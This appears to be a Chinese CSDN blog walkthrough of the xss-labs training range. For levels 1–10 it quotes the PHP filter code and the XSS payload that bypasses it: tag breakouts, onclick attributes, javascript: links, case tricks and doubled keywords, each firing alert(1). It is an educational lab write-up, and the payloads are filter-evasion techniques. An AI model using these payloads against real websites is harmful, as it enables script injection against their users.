【XSS-labs】

最新推荐文章于 2024-06-24 15:34:14 发布
最新推荐文章于 2024-06-24 15:34:14 发布
阅读量108 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/grb819/article/details/119238010
版权

这里写自定义目录标题

1. 概念原理危害修复

特点

  • 一个弹窗的效果
  • XSS 就是代码对数据调试的时候的安全问题
  • JavaScript
  • 浏览器内核版本会决定能否执行js脚本
  • 产生层面:应用层

2. XSS-labs练习

1 无过滤

发现传入参数会直接在页面显示

直接构造JS语句传参

<script>alert(1)</script>

2 构造闭合

直接传参常识,发现JS语句未被执行

查看源码 ,发现php将特殊字符转化为实体的函数

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

构造闭合

"><script>alert(1)</script>

3 鼠标触发事件

将JS传入,F12查看

发现JS的<被转义了,那么如何触发JS执行

用html里面的鼠标点击触发事件执行

源代码

<input name=keyword  value='".htmlspecialchars($str)."'>
//所以playload的闭合符应该是单引号

注意用鼠标触发

'οnclick='alert(1)

4 双引号闭合

<input name=keyword  value="'.$str3.'">
//对比第三关 闭合符应该是

"onclick="alert(1)

5 href绕过

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

查看源代码

对onclick进行过滤

换一种方式

注意闭合符

"><a href="javascript:alert(/xss/)">click me!</a>

6 大小写绕过

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>

查看源代码发现之前的方式都被过滤了href同样

直接尝试到大小写绕过,发现成功

"><a hREf="javascript:alert(/xss/)">click me!</a>

7 循环过滤

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>

发现进行了小写转换,无法通过大小写进行绕过

常识循环过滤

"><scriscriptpt>alert(1)</scrscriptipt>

8 编码过滤

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

尝试编码过滤

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nYJJygOS-1627609776406)(C:\Users\19363\AppData\Roaming\Typora\typora-user-images\image-20210725173500766.png)]

9 http://

if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';

查看源码直接按提示 进行绕过

JavaScript:alert('1')//http://

在这里插入图片描述

10 提交参数

$str11 = $_GET["t_sort"];
 
$str22=str_replace(">","",$str11);
 
$str33=str_replace("<","",$str22);
 
<input name="t_sort"  value="'.$str33.'" type="hidden">

直接用t_sort提交参数

?t_sort=click me!" type="button" οnclick="alert(/xss/)

待完善

(∪.∪ )...zzz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-labs靶场
newlife1441的博客
07-29 818
靶场搭建,可以从Github上下载或者直接下载下面的资源入门级别的xss-labs靶场,有需要的自行下载搭建,搭建过程可以参考网上的资料-网络安全文档类资源-CSDN下载入门级别的xss-labs靶场,适合新入门的学生进行练习,希望你可以从中学习到一些解题的相关技巧和关更多下载资源、学习资料请访问CSDN下载频道.https。......
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
XSS-labs详解
ytdd66的博客
03-23 2077
进入靶场点击图片,开始我们的XSS之旅!
xss-labs
Yb_140的博客
03-26 1539
xss-labs下载地址:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台 目录 level1 level2 level3 level4 level5 level6 level7 level8 level9 level10 level11 level12 level13 level14 level15 level16 level17 level18 level19 level20 level1 猜测使用GET传参,将name显示在
Web渗透-XSS漏洞深入及xss-labs靶场实战
Varin
06-24 1334
xss全称(cross site scripting)跨站脚本攻击,是最常见的web应用程序安全漏洞之一,位于owasptop102013年度第三名xss是指攻击者在网页中嵌入客户端脚本,通常是javascrip编写的危险代码,当用户使用浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的
XSS-labs
YouthBelief的博客
10-18 209
XSSlabs前言level1payload: ``level3payload 'οnmοuseοver='javascript:alert(1)level4payload "οnmοuseοver="javascript:alert(1)level5payload `"> xss `level6大小写混写payload `"> xss level7payload总结 前言 开始做笔记 记录学习 level1 发现url处存在传参 ?name=test 且页面有回显 test
xss-labs-master靶场
K_kiii的博客
03-09 398
level1 发现有一个name参数,值为test;对name进行payload注入 name=<script>alert('hack')</script> 说明源码是完全没有对get请求道德name变量进行过滤,所以会被执行。 level2 1.test是以get请求发送的变量,2.在页面上发现了用户发送的变量 查看源码 发现我们输入的内容是一个文本框的value值,这样浏览器是不会执行我们的注入语句的,所以我们要构造标签闭合 构造闭合标签,把inp
记录自己在xss-labs靶场的通关记录
2302_78903258的博客
06-08 1404
我们下载完之后,就可以进行xss-labs-master的搭建,我本人下载的phpstudy是2018年版的将xss-labs-master安装完之后,放到此目录下,我们原本下载的xss-labs-master,我们可以将,便于我们做题时的搜索对于新版本的phpstudy来说,我们可以将xss-labs-master放到此目录下。访问本地配置的xss-labs。
XSS-labs靶场通关
Fly_Mojito的博客
06-06 702
XSS-labs靶场通关
XSS靶场闯关(xss-labs)
小郑的博客
04-22 1954
对数据进行了是否含有http://做了判断,并对关键字做了替换,把数据加到了a标签的href属性中,在属性中的数据可以考虑编码,并利用js的注释符//注释掉http://当前页面上有两个输出地方,一个输出到了h2标签,后台进行了实体编码,另一个输出到input标签的value属性,没有进行html实体编码,考虑闭合input标签。对on,script进行了替换,将数据加到了input标签的value属性中,没有进行实体编码处理,可以考虑a标签的href属性,可以直接写伪协议。
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 3万+
xss靶场一到二十关通关详细教程
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
安装xss-labs ppt手册
10-22
**XSS漏洞详解与XSS-Labs安装指南** XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的一种攻击方式。它允许攻击者通过注入恶意脚本到网页中,使得用户在不知情的情况下执行这些脚本,从而获取...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
rx_a7_analysis.v
08-06
rx_a7_analysis
Spring Boot高校党务系统.zip
08-06
Spring Boot高校党务系统.zip
简约漂亮的网站弹窗公告源代码 使用cookie记录
08-06
简约漂亮的网站弹窗公告源代码 使用cookie记录
Linux数据传输利器:curl命令的全面指南
最新发布
08-06
Linux是一种开源的、基于Unix的操作系统内核,由林纳斯·托瓦兹(Linus Torvalds)于1991年首次发布。Linux内核是操作系统的核心部分,负责管理系统资源、调度进程、处理硬件设备请求等。Linux内核以其稳定性、安全性、灵活性和高性能而闻名。 Linux操作系统的特点包括: 1. **开源**:Linux的源代码对所有人开放,任何人都可以查看、修改和重新发布。 2. **跨平台**:Linux可以在多种硬件平台上运行,包括个人电脑、服务器、移动设备、嵌入式系统等。 3. **多用户和多任务**:Linux支持多用户同时使用系统,并且能够同时执行多个任务。 4. **稳定性和安全性**:Linux系统以其稳定性和安全性而著称,适合用于服务器和其他需要高可靠性的应用。 5. **社区支持**:Linux拥有一个庞大的开发者和用户社区,提供大量的支持和资源。 6. **定制性**:用户可以根据自己的需要定制Linux系统,包括选择不同的桌面环境、应用程序和配置选项。 7. **广泛的软件支持**:Linux拥有丰富的软件库,包括服务器软件、图形界面、办公软件、开发工具
xss-labs安装
07-28
XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台。根据引用\[1\],在学习了XSS的基础知识并完成了一些简单的XSS测试后,可以开始攻略XSS-labs。不过需要注意的是,对于XSS-labs,我们只需大致了解一些思路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值